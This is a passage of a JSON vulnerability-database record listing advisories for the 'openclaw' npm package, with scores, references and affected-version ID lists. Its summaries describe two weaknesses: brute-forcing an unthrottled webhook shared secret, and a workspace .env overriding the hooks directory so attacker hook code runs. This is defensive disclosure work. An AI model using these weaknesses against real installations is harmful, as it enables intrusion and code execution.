.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41355"},{"reference_url":"https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"}],"url":"https://www.vulncheck.com/advisories/openshell-arbitrary-code-execution-via-mirror-mode-sandbox-file-conversion"},{"reference_url":"https://github.com/advisories/GHSA-42mx-vp8m-j7qh","reference_id":"GHSA-42mx-vp8m-j7qh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-42mx-vp8m-j7qh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41355","GHSA-42mx-vp8m-j7qh"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vqrj-z6tx-rff2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90962?format=json","vulnerability_id":"VCID-vtqt-bgz7-yub6","summary":"Duplicate Advisory: OpenClaw's Nextcloud Talk webhook missing rate limiting on shared secret authentication\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9528-x887-j2fp. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a missing rate limiting vulnerability in the Nextcloud Talk webhook authentication that allows attackers to brute-force weak shared secrets. Attackers who can reach the webhook endpoint can exploit this to forge inbound webhook events by repeatedly attempting authentication without throttling.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/e403decb6e20091b5402780a7ccd2085f98aa3cd"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9528-x887-j2fp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33580"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-brute-force-attack-via-missing-rate-limiting-on-webhook-shared-secret-authentication"},{"reference_url":"https://github.com/advisories/GHSA-gm9m-x74r-8whg","reference_id":"GHSA-gm9m-x74r-8whg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gm9m-x74r-8whg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["GHSA-gm9m-x74r-8whg"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vtqt-bgz7-yub6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90013?format=json","vulnerability_id":"VCID-vx5d-3d98-7kf3","summary":"OpenClaw: Workspace `.env` can override the bundled hooks root and load attacker hook code\n## Summary\nWorkspace `.env` can override the bundled hooks root and load attacker hook code\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets workspace .env override OPENCLAW_BUNDLED_HOOKS_DIR, which can replace trusted default-on bundled hooks from an untrusted workspace.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `330a9f98cb29c79b1c16a2117e03d6276a0d6289` — 2026-03-31T19:25:12+09:00\n\nOpenClaw thanks @nexrin for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41336","reference_id":"","reference_type":"","scores":[{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03575","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03582","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00016","scoring_system":"epss","scoring_elements":"0.03589","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41336"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/330a9f98cb29c79b1c16a2117e03d6276a0d6289"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-3qpv-xf3v-mm45"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41336","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41336"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override","reference_id":"","reference_type":"","scores":[{"value":"7.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-arbitrary-hook-code-execution-via-openclaw-bundled-hooks-dir-environment-variable-override"},{"reference_url":"https://github.com/advisories/GHSA-3qpv-xf3v-mm45","reference_id":"GHSA-3qpv-xf3v-mm45","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3qpv-xf3v-mm45"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-x